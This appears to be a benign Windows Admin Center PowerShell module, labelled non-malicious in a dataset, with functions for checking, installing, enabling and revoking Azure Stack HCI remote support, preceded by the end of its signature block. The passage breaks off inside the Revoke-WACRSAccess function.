lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIKssaeVczmQgezQ6TQqmw62I # s11tqGTKmJtKnAgE/e0nMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEABomeXJboGvJqaekNMW9/oGLabGDKlDPnUes6tcKFbScUgo7BcKeagG/o # gg5UH8xnGIw36zmuRoIiC5Y1OfvOQaAyUtE3rkyePOhDLsVMbagc44XJ/092fQx3 # BYF+3XssYAqm0OyHrAI7hyHFCzLGmQBZWjm14R3PvbzxaJxlZhUcZ6634Dnnk10x # mgwluVWJ5TY52zC5sEf1UdjJXuwNU2fSF9hhRpNevCbQWBIIDjauLxmMaHQKLUeO # x7jmnX8aFRSqdMa+0wypCfabzxIwfVSk/gVbTLZzTl16TFLRebKDlWprCaF3sLY2 # eSy/vCPPrD2+wr+pWRj9niMaQYkbjqGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCA2AUVIIHedYdS+U5R9r2a3iTkcAb7WYu2rpge6H+6vPQIGZk4HtKPJ # GBMyMDI0MDUyMzE2MzYzNS44NTNaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OkQwODItNEJGRC1FRUJBMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHcweCMwl9YXo4AAQAAAdwwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzA2WhcNMjUwMTEwMTkwNzA2WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpEMDgyLTRC # RkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvIsyA1sjg9kSKJzelrUWF5 # ShqYWL83amn3SE5JyIVPUC7F6qTcLphhHZ9idf21f0RaGrU8EHydF8NxPMR2KVNi # AtCGPJa8kV1CGvn3beGB2m2ltmqJanG71mAywrkKATYniwKLPQLJ00EkXw5TSwfm # JXbdgQLFlHyfA5Kg+pUsJXzqumkIvEr0DXPvptAGqkdFLKwo4BTlEgnvzeTfXukz # X8vQtTALfVJuTUgRU7zoP/RFWt3WagahZ6UloI0FC8XlBQDVDX5JeMEsx7jgJDdE # nK44Y8gHuEWRDq+SG9Xo0GIOjiuTWD5uv3vlEmIAyR/7rSFvcLnwAqMdqcy/iqQP # MlDOcd0AbniP8ia1BQEUnfZT3UxyK9rLB/SRiKPyHDlg8oWwXyiv3+bGB6dmdM61 # ur6nUtfDf51lPcKhK4Vo83pOE1/niWlVnEHQV9NJ5/DbUSqW2RqTUa2O2KuvsyRG # MEgjGJA12/SqrRqlvE2fiN5ZmZVtqSPWaIasx7a0GB+fdTw+geRn6Mo2S6+/bZEw # S/0IJ5gcKGinNbfyQ1xrvWXPtXzKOfjkh75iRuXourGVPRqkmz5UYz+R5ybMJWj+ # mfcGqz2hXV8iZnCZDBrrnZivnErCMh5Flfg8496pT0phjUTH2GChHIvE4SDSk2hw # WP/uHB9gEs8p/9Pe/mt9AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU6HPSBd0OfEX3 # uNWsdkSraUGe3dswHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBANnrb8Ewr8eX/H1s # Kt3rnwTDx4AqgHbkMNQo+kUGwCINXS3y1GUcdqsK/R1g6Tf7tNx1q0NpKk1JTupU # JfHdExKtkuhHA+82lT7yISp/Y74dqJ03RCT4Q+8ooQXTMzxiewfErVLt8Wefebnc # ST0i6ypKv87pCYkxM24bbqbM/V+M5VBppCUs7R+cETiz/zEA1AbZL/viXtHmryA0 # CGd+Pt9c+adsYfm7qe5UMnS0f/YJmEEMkEqGXCzyLK+dh+UsFi0d4lkdcE+Zq5JN # jIHesX1wztGVAtvX0DYDZdN2WZ1kk+hOMblUV/L8n1YWzhP/5XQnYl03AfXErn+1 # Eatylifzd3ChJ1xuGG76YbWgiRXnDvCiwDqvUJevVRY1qy4y4vlVKaShtbdfgPyG # eeJ/YcSBONOc0DNTWbjMbL50qeIEC0lHSpL2rRYNVu3hsHzG8n5u5CQajPwx9Pzp # sZIeFTNHyVF6kujI4Vo9NvO/zF8Ot44IMj4M7UX9Za4QwGf5B71x57OjaX53gxT4 # vzoHvEBXF9qCmHRgXBLbRomJfDn60alzv7dpCVQIuQ062nyIZKnsXxzuKFb0TjXW # w6OFpG1bsjXpOo5DMHkysribxHor4Yz5dZjVyHANyKo0bSrAlVeihcaG5F74SZT8 # FtyHAW6IgLc5w/3D+R1obDhKZ21WMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpE # MDgyLTRCRkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAHDn/cz+3yRkIUCJfSbL3djnQEqaggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOn515cwIhgPMjAyNDA1MjMyMjU2MjNaGA8yMDI0MDUyNDIyNTYyM1owdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6fnXlwIBADAHAgEAAgIFrTAHAgEAAgIRbDAKAgUA # 6fspFwIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAKLbQP2o2oYY1JaYkMBF # HiXZsY2dNr0/C09TcOY4okFr9EZPWBhZV6P4pxnyiT+JFBgNnCf0rV64BS/LAdL4 # 8OdF6LLw39eOQ+18pq+ruk244YALqUlezhsROCUuwWIopCP+4iHJ7w8/yqUgEXj6 # UhTVXf80wr/97vE9Q0CeAeQuMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHcweCMwl9YXo4AAQAAAdwwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQg7g9xhqhI1Zdnw+0MLuwERH5cmiQTfA3wuptLsP/pcrcwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCBTpxeKatlEP4y8qZzjuWL0Ou0IqxELDhX2TLylxIIN # NzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB3MHg # jMJfWF6OAAEAAAHcMCIEIKYxqWzLp6lAlWWdYPqylv8UYBtFQXVckK407fyIPsfd # MA0GCSqGSIb3DQEBCwUABIICAB9rsqLarnhccmDZMZiQo3cVnsczDfxEJFq+ToLa # PJL3b5eVKAke/aT6bv31frpKBirkqGmS+94d8p8rsMuqH/MJ5Jae5CLzD52NiMuH # RSkFVjL9DPsLANz7BlPHjil1kNtOMPMwGAelxfFknsuocxLEjQsDnxqDIObkApxN # udbpr3LEkmRnHLBQ8QRt3S0Jw2OQTM0nXwYlg/Tqd49XJc/rThtgtzPhW6wwPfhm # +j4/KJyzi+HS+h3D5vjM4ennbADw4S1/yFQmgAvaCY52EPCiflq2IoVA+q5mRDH2 # 9+lLx9lNyjWtw8gmok9yewddBEQK1WlWaethz1LTuQEAUSf3GlvhiZU9/RmsKQab # hUezO73Urbnd3Q4GDuglX0/GkHPEtGRedxRGzo0Q+2yQ0YdjKYHQIrucbWwq4q9J # XkYbIcaF2VLYd/dO8+LEAvEpurz9UlrXSt7uu7knsTVzQ+3m9xZ9z9CbD4SYbJH9 # 9h3T0GLD56Wb9yvCieCdlX5WJAj7JAkuDyvmRZZlg8UahfUpV3CCyxaukETQhr1x # FBGqiwRVO/qhGtYWjbfDYkBJa2ypY3QQ7GxXUtphY6Pv5jffxafFTkoW7nDpijJ0 # ITSkhyMhx1tXcl0bSzvvN642M22X5tl95mMkZZJ1NYYTINrRXEJg4DJXOqktFbyB # fux9 # SIG # End signature block
combined_dataset/train/non-malicious/sample_37_55.ps1
sample_37_55.ps1
function Confirm-WACRSASZEnvironment { <# .SYNOPSIS Check whether environment is ASZ or HCI. Returns true if ASZ, false if not .DESCRIPTION Check whether environment is ASZ or HCI. Returns true if ASZ, false if not .ROLE Readers #> try { $regKeyPath = 'HKLM:/SOFTWARE/Microsoft/AzureStack' if (test-path -Path $regKeyPath) { $deviceType = (Get-ItemProperty -Path $regKeyPath -ErrorAction SilentlyContinue).DeviceType; if($deviceType -eq 'AzureEdge') { return $true }; }; return $false } catch { return $false } # Stop-Transcript } ## [END] Confirm-WACRSASZEnvironment ## function Confirm-WACRSAgent { <# .SYNOPSIS Verify (return true) if remote support agent was successfully installed by doing 3 checks: 1/ Verify if RemoteSupportAgent service is running 2/ Verify if both JEA endpoints are created 3/ Verify if RemoteSupportJEA scheduledTask is complete (not in Running state) .DESCRIPTION Verify (return true) if remote support agent was successfully enabled by doing 2 checks: 1/ Verify if RemoteSupportAgent service is running 2/ Verify if both JEA endpoints are created 3/ Verify if RemoteSupportJEA scheduledTask is complete (not in Running state) .ROLE Readers #> # # Create log file # $logFileFolder = Join-Path -Path $env:TEMP -ChildPath "WACRemoteSupportLogs" # if (-not(Test-Path $logFileFolder)) { # New-Item -ItemType Directory -Path $logFileFolder # } # $logFileName = "WAC_Confirm_Agent" + ".log" # $logFilePath = Join-Path -Path $logFileFolder -ChildPath $logFileName # Start-Transcript -Path $logFilePath # $date = Get-Date # $datestring = "{0}{1:d2}{2:d2}-{3:d2}{4:d2}" -f $date.year,$date.month,$date.day,$date.hour,$date.minute # Write-Host $datestring try { # Check if this is ASZ. If ASZ, agent is already installed and JEA endpoints are already there $regKeyPath = 'HKLM:/SOFTWARE/Microsoft/AzureStack' if (test-path -Path $regKeyPath) { $deviceType = (Get-ItemProperty -Path $regKeyPath -ErrorAction SilentlyContinue).DeviceType; if($deviceType -eq 'AzureEdge') { return $true } } } catch { Write-Host 'Unable to verify if device type is ASZ' } try { Write-Host 'second try-catch' $service = Get-Service -Name *RemoteSupportAgent* -ErrorAction Stop $config1 = Get-PSSessionConfiguration SupportDiagnosticEndpoint -ErrorAction Stop $config2 = Get-PSSessionConfiguration SupportDiagnosticRepairEndpoint -ErrorAction Stop $scheduledTask = Get-ScheduledTask -TaskName RemoteSupportJEA -ErrorAction Stop if (($service) -and ($service.Status -eq "Running") -and ($scheduledTask) -and ($scheduledTask.State -ne "Running")) { return $true } return $false } catch { return $false } # Stop-Transcript } ## [END] Confirm-WACRSAgent ## function Get-WACRSAccessStatus { <# .SYNOPSIS Gets the remote support access status on cluster .DESCRIPTION Gets the remote support access status on cluster .ROLE Readers #> # Get the latest version of Az.StackHCI module try { $module = Get-Module -Name Az.StackHCI -ListAvailable | Sort-Object -Property Version -Descending | Microsoft.PowerShell.Utility\Select-Object -First 1 if ($module.version.major -lt 1 -and $module.version.minor -lt 10) { # insufficient version - get a new one from PS Gallery Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } else { Import-Module $module -ErrorAction Stop } } catch { Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } try { $result = Get-AzStackHCIRemoteSupportAccess -Verbose } catch { $result = $null } return $result } ## [END] Get-WACRSAccessStatus ## function Get-WACRSAgentVer { <# .SYNOPSIS If environment is HCI, gets version of remote support agent on node. If environment is ASZ, no need to manage agent/agent version through WAC, therefore returns 'ASZ' string .DESCRIPTION If environment is HCI, gets version of remote support agent on node. If environment is ASZ, no need to manage agent/agent version through WAC, therefore returns 'ASZ' string .ROLE Readers #> try { # Check if this is ASZ. If ASZ, agent is already installed and JEA endpoints are already there $regKeyPath = 'HKLM:/SOFTWARE/Microsoft/AzureStack' if (test-path -Path $regKeyPath) { $deviceType = (Get-ItemProperty -Path $regKeyPath -ErrorAction SilentlyContinue).DeviceType; if($deviceType -eq 'AzureEdge') { return 'ASZ' } } } catch { Write-Host 'Unable to verify if device type is ASZ' } try { return (Get-ItemProperty -Path "HKLM:\SYSTEM\Software\Microsoft\RemoteSupportAgent\").ActiveVersion } catch { return $null } } ## [END] Get-WACRSAgentVer ## function Get-WACRSNodeFqdnAndState { <# .SYNOPSIS Gets a list of cluster nodes with FQDN and state of node .DESCRIPTION Gets a list of cluster nodes with FQDN and state of node .ROLE Readers #> Import-Module -Name Microsoft.PowerShell.Management -ErrorAction SilentlyContinue $nodes = @() Get-Clusternode | ForEach-Object { $fqdn = $null $err = $null try { # there could be a DNS lookup issue $fqdn = [System.Net.Dns]::GetHostEntry($_.Name).HostName; } catch { $err = $_ } $nodes += @{ name = $_.Name fqdn = $fqdn state = $_.State.value__; error = $err } } $nodes } ## [END] Get-WACRSNodeFqdnAndState ## function Get-WACRSSessions { <# .SYNOPSIS Gets a list of all remote support sessions .DESCRIPTION Gets a list of all remote support sessions .ROLE Readers #> #Get the latest version of Az.StackHCI module try { $module = Get-Module -Name Az.StackHCI -ListAvailable | Sort-Object -Property Version -Descending | Microsoft.PowerShell.Utility\Select-Object -First 1 if ($module.version.major -lt 1 -and $module.version.minor -lt 10) { # insufficient version - get a new one from PS Gallery Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } else { Import-Module $module -ErrorAction Stop } } catch { Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } $fromDate = (Get-Date).AddDays(-45) $sessions = Get-AzStackHCIRemoteSupportSessionHistory -FromDate $fromDate #Convert nodenames to fqdn foreach ($sess in $sessions) { $fqdn = $null $fqdn = [System.Net.Dns]::GetHostEntry($sess.NodeName).HostName; $sess.NodeName = $fqdn } return $sessions } ## [END] Get-WACRSSessions ## function Get-WACRSTranscript { <# .SYNOPSIS Gets transcript of a remote support session .DESCRIPTION Gets transcript of a remote support session .ROLE Readers #> param( [Parameter(Mandatory = $true)] [string] $SessionId ) #Get the latest version of Az.StackHCI module try { $module = Get-Module -Name Az.StackHCI -ListAvailable | Sort-Object -Property Version -Descending | Microsoft.PowerShell.Utility\Select-Object -First 1 if ($module.version.major -lt 1 -and $module.version.minor -lt 10) { # insufficient version - get a new one from PS Gallery Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } else { Import-Module $module -ErrorAction Stop } } catch { Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } $sess = Get-AzStackHCIRemoteSupportSessionHistory -SessionId $SessionId -IncludeSessionTranscript return $sess.Transcript } ## [END] Get-WACRSTranscript ## function Grant-WACRSAccess { <# .SYNOPSIS Enable Remote Support .DESCRIPTION Enable Remote Support .ROLE Administrators #> param( [Parameter(Mandatory = $true)] [string] $accessLevel, [Parameter(Mandatory = $true)] [int] $expireInMinutes, [Parameter(Mandatory = $false)] [string] $sasToken ) #Get the latest version of Az.StackHCI module try { $module = Get-Module -Name Az.StackHCI -ListAvailable | Sort-Object -Property Version -Descending | Microsoft.PowerShell.Utility\Select-Object -First 1 if ($module.version.major -lt 1 -and $module.version.minor -lt 10) { # insufficient version - get a new one from PS Gallery Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } else { Import-Module $module -ErrorAction Stop } } catch { Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } # Create log file $date = Get-Date $datestring = "{0}{1:d2}{2:d2}-{3:d2}{4:d2}" -f $date.year,$date.month,$date.day,$date.hour,$date.minute $logFileFolder = Join-Path -Path $env:TEMP -ChildPath "WACRemoteSupportLogs" if (-not(Test-Path $logFileFolder)) { New-Item -ItemType Directory -Path $logFileFolder } $logFileName = "WAC_Enable_Access_" + $datestring + ".log" $logFilePath = Join-Path -Path $logFileFolder -ChildPath $logFileName Start-Transcript -Path $logFilePath if ($sasToken) { Enable-AzStackHCIRemoteSupport -AccessLevel $accessLevel -ExpireInMinutes $expireInMinutes -SasCredential $sasToken -AgreeToRemoteSupportConsent } else { Enable-AzStackHCIRemoteSupport -AccessLevel $accessLevel -ExpireInMinutes $expireInMinutes -AgreeToRemoteSupportConsent } Stop-Transcript } ## [END] Grant-WACRSAccess ## function Install-WACRSAgent { <# .SYNOPSIS Install Remote Support Agent .DESCRIPTION Install Remote Support Agent .ROLE Administrators #> #Get the latest version of Az.StackHCI module try { $module = Get-Module -Name Az.StackHCI -ListAvailable | Sort-Object -Property Version -Descending | Microsoft.PowerShell.Utility\Select-Object -First 1 if ($module.version.major -lt 1 -and $module.version.minor -lt 10) { # insufficient version - get a new one from PS Gallery Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } else { Import-Module $module -ErrorAction Stop } } catch { Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } # Create log file $date = Get-Date $datestring = "{0}{1:d2}{2:d2}-{3:d2}{4:d2}" -f $date.year,$date.month,$date.day,$date.hour,$date.minute $logFileFolder = Join-Path -Path $env:TEMP -ChildPath "WACRemoteSupportLogs" if (-not(Test-Path $logFileFolder)) { New-Item -ItemType Directory -Path $logFileFolder } $logFileName = "WAC_Install_Agent_" + $datestring + ".log" $logFilePath = Join-Path -Path $logFileFolder -ChildPath $logFileName Start-Transcript -Path $logFilePath Install-AzStackHCIRemoteSupport Stop-Transcript } ## [END] Install-WACRSAgent ## function Revoke-WACRSAccess { <# .SYNOPSIS Disable Remote Support .DESCRIPTION Disable Remote Support .ROLE Administrators #> #Get the latest version of Az.StackHCI module try { $module = Get-Module -Name Az.StackHCI -ListAvailable | Sort-Object -Property Version -Descending | Microsoft.PowerShell.Utility\Select-Object -First 1 if ($module.version.major -lt 1 -and $module.version.minor -lt 10) { # insufficient version - get a new one from PS Gallery Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | 